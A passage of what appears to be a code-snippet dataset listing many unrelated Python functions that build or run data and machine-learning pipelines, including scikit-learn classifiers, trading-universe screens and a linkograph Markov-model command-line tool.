\"oppo_score\",\n \"result\",\n \"margin\",\n \"team_goals\",\n \"team_behinds\",\n ]\n ),\n \"match_data_f\",\n \"match_data_g\",\n ),\n node(match.add_cum_win_points, \"match_data_g\", \"match_data_h\"),\n node(match.add_win_streak, \"match_data_h\", \"match_data_i\"),\n ]\n )", "def pipeline(self):\n steps = [('DummyDefense', DummyDefense()),\n ('DummyClassifier', DummyClassifier())]\n return Pipeline(steps)", "def pipe(self, func, *args, **kwargs):\n return func(self, *args, **kwargs)", "def pipeline(self) -> Pipeline:\n if self._to_pipeline is None:\n raise AttributeError(\n \"pipeline not available because `to_pipeline` was not set on __init__.\"\n )\n return self._to_pipeline(self)", "def pipeline(self):\n return stanza.Pipeline(dir=TEST_MODELS_DIR, processors=\"tokenize,ner\")", "def make_full_pipeline(\n preprocess_pipe: ColumnTransformer, model: BaseEstimator\n) -> Pipeline:\n full_pipe = sklearn.pipeline.Pipeline(\n [(\"preprocess\", preprocess_pipe), (\"model\", model)]\n )\n return full_pipe", "def pipeline():\n\n test_pipeline = (Pipeline()\n .init_variable('current_loss')\n .init_model('model', C('model_class'),\n 'dynamic', C('model_config'))\n .to_array(dtype='float32')\n .train_model('model',\n inputs=B('images'),\n targets=B('labels'),\n outputs='loss',\n save_to=V('current_loss'))\n )\n return test_pipeline", "def build_svm_pipeline():\n svm_pipeline = None\n\n svm_pipeline = Pipeline([\n ('vect', CountVectorizer()),\n ('clf', SGDClassifier()),\n ])\n\n return svm_pipeline", "def run(self):\n pipeline = set_pipeline()\n pipeline.fit(self.X_train, self.y_train)\n return pipeline", "def create_pipeline(path):\n\n pipeline = import_file(path)\n # Perform Wigner-Seitz analysis:\n ws = WignerSeitzAnalysisModifier(\n output_displaced=False, # Output sites\n per_type_occupancies=True, # Output occupancies per atom type\n affine_mapping=ReferenceConfigurationModifier.AffineMapping.ToReference)\n pipeline.modifiers.append(ws)\n # Calculate total and elementwise occupancies\n pipeline.modifiers.append(total_occupancy_modifier)\n # Select all defect sites\n pipeline.modifiers.append(select_defects_modifier)\n # Delete all non-defect sites\n pipeline.modifiers.append(InvertSelectionModifier())\n pipeline.modifiers.append(DeleteSelectedModifier())\n # Find defect clusters\n pipeline.modifiers.append(ClusterAnalysisModifier(\n cutoff=CLUSTER_CUTOFF,\n sort_by_size=False))\n # Classify defect clusters\n pipeline.modifiers.append(classify_defect_clusters_modifier)\n\n return pipeline", "def _pipeline(self, vectorizer, n_features, ngram_range, C):\n classifier = SVC(kernel=\"linear\", C=C, max_iter=1000000, shrinking=1, tol=0.0001)\n vectorizer.set_params(stop_words=None, max_features=self.max_features, ngram_range=ngram_range)\n \n checker_pipeline = Pipeline([\n ('vectorizer', vectorizer),\n ('reduce_dim', SelectKBest(chi2, k=n_features)),\n ('classify', classifier)])\n\n return checker_pipeline", "def pipeline(self):\n return stanza.Pipeline(dir=TEST_MODELS_DIR, processors=\"tokenize,ner\", package={\"ner\": [\"ncbi_disease\", \"ontonotes\"]})", "def make_pipeline():\n # exchange = Fundamentals.exchange_id.latest\n # nyse_filter = exchange.eq('NYS')\n symbol_filter = StaticSids([TRADING_SID])\n set_benchmark(TRADING_SID) \n # volume_filter = VolumeFilter(\n # inputs=[USEquityPricing.volume],\n # window_length=1,\n # mask=symbol_filter\n # )\n\n # is_setup = volume_filter & alpha_long_weekly & alpha_long_daily\n weekly_high = WeeklyHigh(\n inputs=[USEquityPricing.high],\n mask=symbol_filter\n )\n weekly_low = WeeklyLow(\n inputs=[USEquityPricing.low],\n mask=symbol_filter\n )\n weekly_classifier = WeeklyClassifier(\n inputs=[\n USEquityPricing.open,\n USEquityPricing.high,\n USEquityPricing.low,\n USEquityPricing.close\n ],\n mask=symbol_filter\n )\n daily_classifier = DailyClassifier(\n inputs=[\n USEquityPricing.open,\n USEquityPricing.high,\n USEquityPricing.low,\n USEquityPricing.close\n ],\n mask=symbol_filter\n\n )\n\n pipe = Pipeline(\n screen=symbol_filter, # & (daily_classifier > 0),\n columns={\n 'daily_classifier': daily_classifier,\n 'daily_high': USEquityPricing.high.latest,\n 'daily_low': USEquityPricing.low.latest,\n 'weekly_classifier': weekly_classifier,\n 'weekly_high': weekly_high,\n 'weekly_low': weekly_low\n }\n )\n return pipe", "def make_pipeline():\n universe = TradableStocksUS('Real Estate') | TradableStocksUS('Utilities') | \\\n TradableStocksUS('Consumer Staples') | TradableStocksUS('Technology') | \\\n TradableStocksUS('Financials') | TradableStocksUS('Energy') | \\\n TradableStocksUS('Materials') | TradableStocksUS('Health Care') | \\\n TradableStocksUS('Industrials') | TradableStocksUS('Consumer Discretionary') | \\\n TradableStocksUS('Communications')\n\n roic = shfd.slice(dimension='MRT', period_offset=0).ROIC.latest\n ebit = shfd.slice(dimension='MRQ', period_offset=0).EBIT.latest\n ev = shfd.slice(dimension='MRQ', period_offset=0).EV.latest\n volatility = AnnualizedVolatility(window_length=100)\n value = ebit / ev\n\n roic_rank = roic.rank(mask=universe)\n value_rank = value.rank(mask=universe)\n volatility_rank = volatility.rank(mask=universe, ascending=False)\n\n spy_ma100_price = SMA(inputs=[USEquityPricing.close], \n window_length=100)[algo.sid(\"FIBBG000BDTBL9\")]\n spy_price = USEquityPricing.close.latest[algo.sid(\"FIBBG000BDTBL9\")]\n\n momentum_score = MomentumScore()\n\n overall_rank = roic_rank + value_rank + volatility_rank\n\n # seven_month_returns = Returns(window_length=148, mask=universe,)\n # one_month_returns = Returns(window_length=30, mask=universe,)\n\n pipeline = Pipeline(\n columns={\n 'stock' : master.SecuritiesMaster.Symbol.latest,\n 'sid': master.SecuritiesMaster.Sid.latest,\n 'sector' : master.SecuritiesMaster.usstock_Sector.latest,\n 'average_dollar_volume': AverageDollarVolume(window_length=200),\n 'price': EquityPricing.close.latest,\n 'volume': EquityPricing.volume.latest,\n 'roic' : roic,\n 'value' : value,\n 'volatility': volatility,\n 'roic_rank' : roic_rank,\n 'value_rank' : value_rank,\n 'momentum': momentum_score,\n 'momentum_decile': momentum_score.deciles(),\n 'volatility_decile' : volatility.deciles(),\n 'overall_rank' : overall_rank,\n 'overall_rank_decile': overall_rank.deciles(),\n 'trend_filter': spy_price > spy_ma100_price,\n # 'returns' : one_month_returns - seven_month_returns\n }, \n screen = universe\n )\n\n return pipeline", "def build_naive_bayes():\n nb_pipeline = None\n ##### Write code here\n nb_pipeline = Pipeline([\n ('vect', CountVectorizer()),\n ('clf', ComplementNB())\n ])\n\n ##### End of your work ######\n return nb_pipeline", "def _make_pipeline(preprocessors, classifier):\n if isinstance(preprocessors, list):\n # support only preprocessing of lenght 2\n return make_pipeline(preprocessors[0], preprocessors[1], classifier)\n if preprocessors is None:\n return make_pipeline(classifier)\n\n return make_pipeline(preprocessors, classifier)", "def get_pipeline(self):\n if hasattr(self, \"pipeline\"):\n return self.pipeline\n steps = [\n # before preprocessor, comes the feature extractor\n ('extractor', TurkishFeatureExtractor()),\n # first the pre-processor\n (\"preprocessor\", TurkishPreprocessor(self.stemmer_name_to_method[self.stemmer_method])),\n (\"vectorizer\", TurkishVectorizer(self.feature_name_to_class[self.feature])),\n # use pca\n # (\"pca\", TruncatedSVD(n_components=20, n_iter=10)),\n (\"adder\", TurkishFeatureAdder(n_components=20, n_iter=10)),\n (\"model\", self.model_name_to_class[self.model])\n ]\n self.pipeline = Pipeline(steps)\n return self.pipeline", "def create_pipeline(clf):\n return Pipeline([('scaler', MinMaxScaler()), ('clf', clf)])", "def pipeline(self):\n # gotta avoid circular imports by deferring\n from .pipeline import Pipeline\n return Pipeline().from_source(self._collection)", "def _create_pipeline(self) -> TfmIterator:\n # 1. Initialise TubRecord -> x, y transformations\n def get_x(record: TubRecord) -> Dict[str, Union[float, np.ndarray]]:\n \"\"\" Extracting x from record for training\"\"\"\n out_dict = self.model.x_transform(record, self.image_processor)\n # apply the normalisation here on the fly to go from uint8 -> float\n out_dict['img_in'] = normalize_image(out_dict['img_in'])\n return out_dict\n\n def get_y(record: TubRecord) -> Dict[str, Union[float, np.ndarray]]:\n \"\"\" Extracting y from record for training \"\"\"\n y = self.model.y_transform(record)\n return y\n\n # 2. Build pipeline using the transformations\n pipeline = self.sequence.build_pipeline(x_transform=get_x,\n y_transform=get_y)\n return pipeline", "def create_pipeline(self, train: LAMLDataset) -> LAMLTransformer:\n raise NotImplementedError", "def get_pipeline(features, to_matrix=True):\n feature_names = []\n for feature in features:\n feature_names += feature[1].FEATS\n if to_matrix:\n return Pipeline(features + [('transform', ToMatrix(features=feature_names)), ('norm', MinMaxScaler())])\n else:\n return Pipeline(features)", "def build_model():\n pipeline = Pipeline([\n ('vectorizer', CountVectorizer(tokenizer=tokenize)),\n ('tfidf', TfidfTransformer()),\n # (), # Feature engineering (word2vec/GloVe)\n (\"clf\", MultiOutputClassifier(RandomForestClassifier(n_estimators=100), n_jobs=-1))\n ])\n\n return pipeline", "def pipeline(self, *funcs) -> \"fn\":\n return self._mod.pipeline(self, *funcs)", "def _create_pipeline(self) -> codepipeline.Pipeline:\n source_output = codepipeline.Artifact()\n build_output = codepipeline.Artifact()\n return codepipeline.Pipeline(\n self,\n 'Pipeline',\n stages=[\n self._create_source_stage('Source', source_output),\n # self._create_image_build_stage(\n # 'Build', source_output, build_output),\n # self._create_deploy_stage('Deploy', build_output)\n ]\n )", "def create(pdef):\n from sklearn.pipeline import Pipeline\n return [Pipeline(p) for p in pdef]", "def _get_pipeline(self, params_dict):\n p = Pipeline(steps=[('normalise', StandardScaler()),\n ('add_noise', NoiseAdder()),\n ('dim_reduce', PCA()),\n ('cluster', KMeans())])\n p.set_params(**params_dict)\n return p", "def _make(dataset, model):\n def wrapper(args):\n return SlimExperiment(dataset, model, args)\n return wrapper", "def prime():\n from transformers import pipeline\n\n primer = pipeline(\"feature-extraction\")\n result = primer([\"hello\"])", "def pipeline(func):\n @wraps(func)\n def process(img_or_iterable, *args, **kwargs):\n if isinstance(img_or_iterable, (SliceableIterable, FramesSequence)):\n _len = len(img_or_iterable)\n s = SliceableIterable(img_or_iterable, range(_len), _len)\n s._proc_func = lambda image: func(image, *args, **kwargs)\n return s\n else:\n # Fall back on normal behavior of func, interpreting input\n # as a single image.\n return func(img_or_iterable)\n\n if process.__doc__ is None:\n process.__doc__ = ''\n process.__doc__ = (\"This function has been made pims-aware. When passed\\n\"\n \"a pims reader or SliceableIterable, it will return a \\n\"\n \"new SliceableIterable of the results. When passed \\n\"\n \"other objects, its behavior is \"\n \"unchanged.\\n\\n\") + process.__doc__\n return process", "def pipe(self, func: Callable, *args, **kwargs) -> Any:\n return func(self, *args, **kwargs)", "def make_pipeline(sec_list, context):\n\n # Return Factors\n mask = SecurityInList()\n mask.securities = sec_list\n mask = mask.eq(1)\n yr_returns = Returns(window_length=context.return_period, mask=mask)\n sharpe = SharpeRatio(inputs=[yr_returns], window_length=context.return_period, mask=mask)\n\n pipe = Pipeline(\n screen=mask,\n columns={\n 'yr_returns': yr_returns, 'sharpe': sharpe\n }\n )\n return pipe", "def _create_pipiline(tokenizer, model, device, framework):\n tg_params = dict(\n task=\"text-generation\", tokenizer=tokenizer, model=model,\n framework=\"pt\", device=device,\n )\n text_generation_pipiline = pipeline(**tg_params)\n return text_generation_pipiline", "def construct(args,\n **kwargs):\n kw = parse_args(args)\n kw.update(kwargs)\n return (build_pipeline(**kw),\n kw)", "def pipeline_ml_factory(\n training: Pipeline,\n inference: Pipeline,\n input_name: str = None,\n conda_env: Optional[Union[str, Path, Dict[str, Any]]] = None,\n model_name: Optional[str] = \"model\",\n model_signature: Union[ModelSignature, str, None] = \"auto\",\n **kwargs\n) -> PipelineML:\n\n pipeline = PipelineML(\n nodes=training.nodes,\n inference=inference,\n input_name=input_name,\n conda_env=conda_env,\n model_name=model_name,\n model_signature=model_signature,\n **kwargs\n )\n return pipeline", "def similar_bonds_pipeline():\n pipeline = Pipeline(\n steps=[\n ('scaler', StandardScaler()),\n #('encoder', OneHotEncoder()),\n ('pca', PCA(n_components=3)),\n ('knn', KNN()),\n ]\n )\n return pipeline", "def build_naive_bayes():\n nb_pipeline = None\n \n nb_pipeline = Pipeline([\n ('vect', CountVectorizer()),\n ('clf', ComplementNB()),\n ])\n \n return nb_pipeline", "def process(obj, rv, logfile, verbose):\n _end_branch(obj)\n\n logger.info('creating pipeline...')\n stdin = click.get_text_stream('stdin')\n stdout = click.get_text_stream('stdout')\n\n def write(item):\n stdout.write(str(item))\n stdout.write('\\n')\n\n pl = pipeline.create(obj['pipeline'], output=write)\n\n logger.info('processing...')\n logger.info('----------------------------------------')\n try:\n pl.run(stdin)\n except Exception as e:\n logger.error(f'abort: {type(e).__name__}: {e}')\n raise click.Abort from e\n logger.info('----------------------------------------')\n logger.info('DONE.')", "def pipeline(self, pipeline_id):\r\n return pipelines.Pipeline(self, pipeline_id)", "def pipe(*args, **kwargs):\n return parser(*args, **kwargs)", "def to_sklearn(self):\n import sklearn.pipeline as skp\n\n steps = []\n for step in self.steps:\n steps += [(step[0], step[1].to_sklearn())]\n return skp.Pipeline(steps)", "def make_labels_pipeline(self, dataset, return_epochs=False, return_raws=False):\n if return_epochs:\n labels_pipeline = make_pipeline(\n EpochsToEvents(),\n EventsToLabels(event_id=self.used_events(dataset)),\n )\n elif return_raws:\n labels_pipeline = make_pipeline(\n self._get_events_pipeline(dataset),\n EventsToLabels(event_id=self.used_events(dataset)),\n )\n else: # return array\n labels_pipeline = EventsToLabels(event_id=self.used_events(dataset))\n return labels_pipeline", "def test_pipeline(self):\n loss = NSSALoss\n loss_kwargs = {\"margin\": 1.0, \"adversarial_temperature\": 1.0}\n pipeline_results = pipeline(\n model=\"RotatE\",\n dataset=\"nations\",\n loss=loss,\n loss_kwargs=loss_kwargs,\n training_kwargs=dict(use_tqdm=False),\n )\n self.assertIsInstance(pipeline_results, PipelineResult)\n self.assertIsInstance(pipeline_results.model.loss, loss)\n self.assertEqual(pipeline_results.model.loss.margin, 1.0)\n self.assertEqual(pipeline_results.model.loss.inverse_softmax_temperature, 1.0)", "def __build_ml_pipeline(self, clf: MultiOutputClassifier) -> Pipeline:\r\n pipeline = Pipeline([\r\n ('features', FeatureUnion(\r\n [('text', Pipeline(\r\n [('text_field_extractor', \r\n basic_utils.TextFieldExtractor('message')), \r\n #('vect', CountVectorizer(tokenizer=clean_text)),\r\n #('tfidf', TfidfTransformer())\r\n ('tfidf', TfidfVectorizer(tokenizer=basic_utils.tokenize, \r\n min_df=.0025, max_df=0.25, \r\n ngram_range=(1,2)))\r\n ])),\r\n \r\n ('numerics', FeatureUnion(\r\n [('text_len', \r\n Pipeline([('text_len_extractor', \r\n basic_utils.NumericFieldExtractor('text_len')), \r\n ('text_len_scaler', StandardScaler())\r\n ])),\r\n ('punt_perc', \r\n Pipeline([('punt_perc_extractor', \r\n basic_utils.NumericFieldExtractor('punt_perc')), \r\n ('punt_perc_scaler', StandardScaler())\r\n ]))\r\n ])),\r\n ('starting_verb', basic_utils.PosFieldExtractor('starting_verb_flag'))\r\n ])),\r\n \r\n ('clf', clf)\r\n ])\r\n \r\n return pipeline", "def pipeline(self):\n return self._pipeline", "def pipeline(self):\n return self._pipeline", "def make_pipeline(steps):\n def compose2(f, g):\n return lambda x: g(f(x))\n return functools.reduce(compose2, steps)", "def get_pipeline(tag=None):\n\n\n data_science_pipeline = (\n # interdiction_baseline_call_pl()\n # + interdiction_baseline_parse_pl()\n #+ interdiction_community_pl()\n #+ interdiction_community_parse_pl()\n #+ dijkstra_prep_paths_pl()\n #+ dijkstra_parse_paths_pl()\n #+ dijkstra_reachable_pl()\n #+ dijkstra_shortest_paths_pl()\n + dijkstra_pypy_pickle_pl()\n + dijkstra_pypy_paths_pl()\n + dijkstra_make_adj_pl()\n #+ dijkstra_opt()\n + dijkstra_flow()\n + sds_counterfactual_pl()\n + supply_interdiction_pl()\n + post_supply_interdiction_pl()\n )\n \n if tag:\n if type(tag)==str:\n return Pipeline([n for n in data_science_pipeline.nodes if tag in n.tags])\n elif type(tag)==list:\n return Pipeline([n for n in data_science_pipeline.nodes if len(n.tags - set(tag)) < len(n.tags)])\n \n else:\n return data_science_pipeline", "def pipelines(self):\r\n return pipelines.Pipelines(self)", "def build_model(self):\n pipeline = Pipeline([\n ('vec', CountVectorizer(tokenizer=self.tokenize)),\n ('tfidf', TfidfTransformer()),\n ('clf', MultiOutputClassifier(RandomForestClassifier()))\n ])\n self.model = pipeline\n return pipeline", "def get_cb_pipeline(train):\n from src.features import alchemy_feat, counting_feat, nltk_feat\n features = [\n ('sentiment', alchemy_feat.Sentiment()),\n ('sent_len', counting_feat.SentenceLength()),\n ('tfidf', counting_feat.BagOfTfIDF(train)),\n ('ner', alchemy_feat.NER()),\n ('pos', nltk_feat.POS())\n ]\n return get_pipeline(features)", "def build_logistic_regr():\n logistic_pipeline = None\n ##### Write code here #######\n logistic_pipeline = Pipeline([\n ('vect', CountVectorizer()),\n ('clf', LogisticRegression())\n ])\n ##### End of your work ######\n return logistic_pipeline", "def make_pipeline():\r\n base_universe = Q1500US()\r\n sector = Sector() \r\n # screen is based off of returns\r\n returns = Returns(window_length = 2)\r\n # check if stock price has good strength, but not necessarily overbought\r\n rsi = RSI() \r\n price = USEquityPricing.close.latest\r\n # creating filter by specifying the type of returns desired\r\n top_return_stocks = returns.top(1,mask=base_universe, groupby=sector)\r\n pipe = Pipeline(\r\n columns = {\r\n 'rsi': rsi,\r\n 'price': price\r\n },\r\n # filter top return stocks, and stocks that are not being overbought\r\n # but are not too oversold either\r\n screen = base_universe & top_return_stocks & (20 < rsi < 80)\r\n # the above is equivalent to: choose stocks from the base universe that have had the top returns in their sectors and have a good RSI value\r\n )\r\n return pipe", "def spacy_pipeline() -> spacy.language.Language:\n context = get_spacy_pipeline()\n assert context is not None\n return context", "def test_fit(self, pipeline):\n pipeline.fit(X, Y)", "def run(cls, pipeline, monitor=True, verbose=False):\n\n pipe = cls(pipeline, monitor=monitor, verbose=verbose)\n pipe._main()", "def build(X, y=None):\n model = Pipeline([\n ('preprocessor',NLTKPreprocessor()),\n ('vectorizer', CountVectorizer()),\n ('tfidf', TfidfTransformer()),\n ('clf', OneVsRestClassifier(LinearSVC(C=0.9)))])\n\n model.fit(X, y)\n return model", "def make_pipeline():\n \n # Base universe set to the QTradableStocksUS\n base_universe = QTradableStocksUS()#Q500US()\n base_universe = (base_universe & Q500US())\n base_universe = (base_universe & Fundamentals.market_cap.latest.top(150))\n \n # Factor of yesterday's close price.\n #yesterday_close = USEquityPricing.close.latest\n \n pipe = Pipeline(\n columns={\n #'close': yesterday_close,\n 'sector': Sector(),\n },\n screen=base_universe\n )\n return pipe", "def make_pipeline():\r\n\r\n # Custom universe containing only desired assets (stocks with flag data)\r\n universe = StaticSids(my_stocks)\r\n\r\n return Pipeline(\r\n columns={\r\n #'flag_type': algo_data_full.flag_type.latest,\r\n #'flag_price': algo_data_full.flag_price.latest,\r\n #'end_flag_date': algo_data_full.end_flag_date.latest,\r\n #'end_flag_price': algo_data_full.end_flag_price.latest,\r\n 'up_flags': flag_counts.up.latest,\r\n 'down_flags': flag_counts.down.latest,\r\n 'up_ratio': up_ratios_2.up_ratio.latest,\r\n 'close': USEquityPricing.close.latest,\r\n },\r\n screen=universe\r\n )", "def build_model():\n \n pipeline = Pipeline([\n ('vect', CountVectorizer(tokenizer=tokenize, max_df = 0.75, max_features = 5000, ngram_range = (1, 2))),\n ('tfidf', TfidfTransformer(use_idf = True)),\n ('clf', MultiOutputClassifier(estimator=RandomForestClassifier(n_estimators = 200, min_samples_split = 2)))\n ])\n \n return pipeline", "def pipeline(ctx):\n asyncio.run(pipeline_impl(ctx.obj[\"config\"]))", "def make_process_pipelines(\n self, dataset, return_epochs=False, return_raws=False, postprocess_pipeline=None\n ):\n if return_epochs and return_raws:\n message = \"Select only return_epochs or return_raws, not both\"\n raise ValueError(message)\n\n self.prepare_process(dataset)\n\n raw_pipelines = self._get_raw_pipelines()\n epochs_pipeline = self._get_epochs_pipeline(return_epochs, return_raws, dataset)\n array_pipeline = self._get_array_pipeline(\n return_epochs, return_raws, dataset, postprocess_pipeline\n )\n\n if array_pipeline is not None:\n events_pipeline = (\n self._get_events_pipeline(dataset) if return_raws else EpochsToEvents()\n )\n else:\n events_pipeline = None\n\n if events_pipeline is None and array_pipeline is not None:\n log.warning(\n f\"event_id not specified, using all the dataset's \"\n f\"events to generate labels: {dataset.event_id}\"\n )\n events_pipeline = (\n RawToEvents(dataset.event_id)\n if epochs_pipeline is None\n else EpochsToEvents()\n )\n\n process_pipelines = []\n for raw_pipeline in raw_pipelines:\n steps = []\n steps.append((StepType.RAW, SetRawAnnotations(dataset.event_id)))\n if raw_pipeline is not None:\n steps.append((StepType.RAW, raw_pipeline))\n if epochs_pipeline is not None:\n steps.append((StepType.EPOCHS, epochs_pipeline))\n if array_pipeline is not None:\n array_events_pipeline = ForkPipelines(\n [\n (\"X\", array_pipeline),\n (\"events\", events_pipeline),\n ]\n )\n steps.append((StepType.ARRAY, array_events_pipeline))\n process_pipelines.append(Pipeline(steps))\n return process_pipelines", "def setup_pipeline(self, estimator=None, biclass=True):\n if biclass:\n self.pipeline = Pipeline(estimator)\n else:\n self.pipeline = OneVsOneClassifier(Pipeline(estimator))", "def run(self):\n self.pipeline = self.set_pipeline()\n self.pipeline.fit(self.X,self.y)\n return self", "def _get_pipeline(self, conf: Optional[float] = None, fuse_model: bool = True) -> PoseEstimationPipeline:\n if None in (self._edge_links, self._image_processor, self._default_nms_conf):\n raise RuntimeError(\n \"You must set the dataset processing parameters before calling predict.\\n\" \"Please call `model.set_dataset_processing_params(...)` first.\"\n )\n\n conf = conf or self._default_nms_conf\n\n if len(self._keypoint_colors) != self.num_joints:\n raise RuntimeError(\n \"The number of colors for the keypoints ({}) does not match the number of joints ({})\".format(len(self._keypoint_colors), self.num_joints)\n )\n if len(self._edge_colors) != len(self._edge_links):\n raise RuntimeError(\n \"The number of colors for the joints ({}) does not match the number of joint links ({})\".format(len(self._edge_colors), len(self._edge_links))\n )\n\n pipeline = PoseEstimationPipeline(\n model=self,\n image_processor=self._image_processor,\n edge_links=self._edge_links,\n edge_colors=self._edge_colors,\n keypoint_colors=self._keypoint_colors,\n post_prediction_callback=self.get_post_prediction_callback(conf=conf),\n fuse_model=fuse_model,\n )\n return pipeline", "def make_pipeline(context):\n \n # Base universe of top 500 US stocks.\n base_universe_filter = Q500US()\n\n # Stocks of only tech sector.\n tech_sector = Sector(mask=base_universe_filter)\n tech_universe_filter = base_universe_filter & tech_sector.eq(311)\n\n # Top 10 tech stocks with largest market cap.\n mkt_cap_filter = morningstar.valuation.market_cap.latest\n top_mkt_cap_tech_filter = mkt_cap_filter.top(context.NUM_SYMBOLS, mask=tech_universe_filter)\n\n # Bollinger band factor with Stdev factor 2.\n lower_band_factor, middle_factor, upper_band_factor = BollingerBands(window_length=22, k=2, mask=top_mkt_cap_tech_filter)\n\n # Percent difference between (price, lower_band) and (price, upper_band).\n price = USEquityPricing.close.latest\n buy_percent_factor = ((lower_band_factor - price)*100)/price\n sell_percent_factor = ((price - upper_band_factor)*100)/price\n\n # Mean reversion buy and sell filters.\n # Sell when price exceeds upper-band and buy when price is below lower-band.\n buy_filter = buy_percent_factor > 0\n sell_filter = sell_percent_factor > 0\n\n # Build and return the Pipeline.\n pipe_bbands = Pipeline(columns={'buy_percent': buy_percent_factor,\n 'lower_band': lower_band_factor,\n 'buy': buy_filter,\n 'price': price,\n 'sell': sell_filter,\n 'upper_band': upper_band_factor,\n 'sell_percent': sell_percent_factor}, screen=top_mkt_cap_tech_filter)\n \n return pipe_bbands", "def pipeline(\n self,\n name: str,\n description: Optional[str] = None,\n labels: Optional[Sequence[PipelineLabel]] = None,\n ) -> \"Container\":\n _args = [\n Arg(\"name\", name),\n Arg(\"description\", description, None),\n Arg(\"labels\", labels, None),\n ]\n _ctx = self._select(\"pipeline\", _args)\n return Container(_ctx)", "def main(**kwargs):\n\n wrap_predict(kwargs['input'],\n kwargs['output'],\n kwargs['pipeline'])", "def test_pipe_simple():\n\n def transform(array):\n \"\"\"Turns the (n,2) array into a (n,4) array.\"\"\"\n assert array.shape == (10, 2)\n new = Array(columns=\"abcd\")\n for x, y in array:\n new.append([x, y, x + y, x * y])\n return new\n\n group = Pipe(Group({\"a\": Numerical(), \"b\": Numerical()}), transform)\n for _ in range(10):\n group.set_a(1e-6 + random())\n group.set_b(1e-6 + random())\n group.push()\n\n array = group.array()\n assert array.shape == (10, 4)\n\n for row in array:\n assert row[0] > 0.0 and row[1] > 0.0\n assert row[2] == row[0] + row[1]\n assert row[3] == row[0] * row[1]", "def fill_pipeline():\n\n # m1_pca = PCA()\n m1_pca = PCA(svd_solver='randomized', whiten=True) # 与官网里子一致的后2个参数,否则分数很差\n # m1_pca.fit(X_train)\n\n m2_svc = SVC(kernel='rbf', class_weight='balanced')\n\n pipe = Pipeline(steps=[('pca', m1_pca),\n ('svc', m2_svc)])\n print('\\n===================原 estimator')\n pprint(pipe.named_steps)\n return pipe", "def get_estimator(arguments):\n \n numerical_indices = [1, 2, 4, 5,6,7,8,9,10,11,12,13,14]\n categorical_indices = [0]\n original_indices = list(set(range(59))-set(numerical_indices)-set(categorical_indices))\n \n p1 = make_pipeline(my_module.PositionalSelector(categorical_indices),OneHotEncoder())\n p2 = make_pipeline(my_module.PositionalSelector(numerical_indices),StandardScaler())\n p3 = make_pipeline(my_module.PositionalSelector(original_indices))\n \n feats = FeatureUnion([('categoricals', p1),\n ('numericals', p2),\n ('originals', p3),])\n \n # tolerance and C are expected to be passed as\n # command line argument to task.py\n pipeline = Pipeline([('pre', feats),\n ('estimator', linear_model.LogisticRegression(penalty=\"l2\",\n tol=arguments.tol,\n C = arguments.C,\n solver='lbfgs',\n max_iter=10000))])\n \n # tolerance and C are expected to be passed as\n # command line argument to task.py\n #classifier = linear_model.LogisticRegression(\n # penalty=\"l2\",\n # tol=arguments.tol,\n # C = arguments.C,\n # solver='lbfgs',\n # max_iter=1000\n #)\n \n return pipeline", "def createMarkov(linkograph, linkNum=1, method='link_predictor',\n precision=2):\n\n if method.lower() == 'link_predictor':\n return createLinkPredictorMarkov(linkograph, linkNum=linkNum,\n precision=precision)\n elif method.lower() == 'behavioral':\n return createBehavioralMarkov(linkograph, linkNum=linkNum,\n precision=precision)\n else:\n raise ValueError('Unrecognized method.')", "def pipe(self, func: Callable[..., Any], *args: Any, **kwargs: Any) -> Any:\n\n if isinstance(func, tuple):\n func, target = func\n if target in kwargs:\n raise ValueError(\"%s is both the pipe target and a keyword \" \"argument\" % target)\n kwargs[target] = self\n return func(*args, **kwargs)\n else:\n return func(self, *args, **kwargs)", "def cli_markov():\n\n info = 'Creates a transition matrix from a linkograph.'\n\n parser = argparse.ArgumentParser(description=info)\n\n parser.add_argument('linkograph', metavar='LINKOGRAPH.json',\n nargs=1,\n help='The linkograph')\n\n parser.add_argument('-o', '--out', metavar='OUTPUT_FILE',\n help='Prints the result to a file.')\n\n parser.add_argument('-m', '--method',\n help='The method used to create the model.')\n\n parser.add_argument('-f', '--forelinks', action='store_true',\n help='Use forelinks')\n\n parser.add_argument('-b', '--backlinks', action='store_true',\n help='Use backlinks')\n\n parser.add_argument('-d', '--dot', action='store_true',\n help='Create dot file.')\n\n parser.add_argument('-l', '--latex', action='store_true',\n help='Create latex file.')\n\n parser.add_argument('-t', '--transition', action='store_true',\n help='Use transition matrix')\n\n parser.add_argument('-p', '--precision', type=int,\n help='Number of digits retained.')\n\n args = parser.parse_args()\n\n linkNum = 1 # For forelinks.\n\n if args.backlinks:\n linkNum = 0 # For backlinks.\n\n if args.precision is None:\n args.precision = 2\n\n if args.method is None:\n args.method = 'link_predictor'\n\n linko = linkoCreate.readLinkoJson(args.linkograph[0])\n\n markovChain = createMarkov(linko, linkNum=linkNum,\n method = args.method,\n precision=args.precision)\n\n if args.out is not None:\n fh = open(args.out, 'w')\n else:\n fh = sys.stdout\n\n if args.transition:\n fh.write(str(linko.labels))\n fh.write('\\n')\n fh.write(str(markovChain))\n fh.write('\\n')\n elif args.latex:\n latexString = markovToLatex(markovChain, linko.labels,\n args.precision)\n fh.write(latexString)\n else:\n # markovToDot(markovChain, linko.labels, fh,\n # args.precision)\n\n dotString = markovToDot(markovChain, linko.labels,\n args.precision)\n fh.write(dotString)\n\n fh.close()", "def test_export_pipeline():\n tpot_obj = TPOTClassifier()\n pipeline = creator.Individual.\\\n from_string(\"KNeighborsClassifier(CombineDFs(GradientBoostingClassifier(input_matrix, 38.0, 0.87), SelectKBest(input_matrix, 5)), 18, 33)\", tpot_obj._pset)\n\n expected_code = \"\"\"import numpy as np\n\nfrom sklearn.ensemble import GradientBoostingClassifier, VotingClassifier\nfrom sklearn.feature_selection import SelectKBest, f_classif\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.neighbors import KNeighborsClassifier\nfrom sklearn.pipeline import make_pipeline, make_union\nfrom sklearn.preprocessing import FunctionTransformer\n\n# NOTE: Make sure that the class is labeled 'class' in the data file\ntpot_data = np.recfromcsv('PATH/TO/DATA/FILE', delimiter='COLUMN_SEPARATOR', dtype=np.float64)\nfeatures = np.delete(tpot_data.view(np.float64).reshape(tpot_data.size, -1), tpot_data.dtype.names.index('class'), axis=1)\ntraining_features, testing_features, training_classes, testing_classes = \\\\\n train_test_split(features, tpot_data['class'], random_state=42)\n\nexported_pipeline = make_pipeline(\n make_union(\n make_union(VotingClassifier([('branch',\n GradientBoostingClassifier(learning_rate=1.0, max_features=1.0, n_estimators=500)\n )]), FunctionTransformer(lambda X: X)),\n SelectKBest(k=5, score_func=f_classif)\n ),\n KNeighborsClassifier(n_neighbors=5, weights=\"distance\")\n)\n\nexported_pipeline.fit(training_features, training_classes)\nresults = 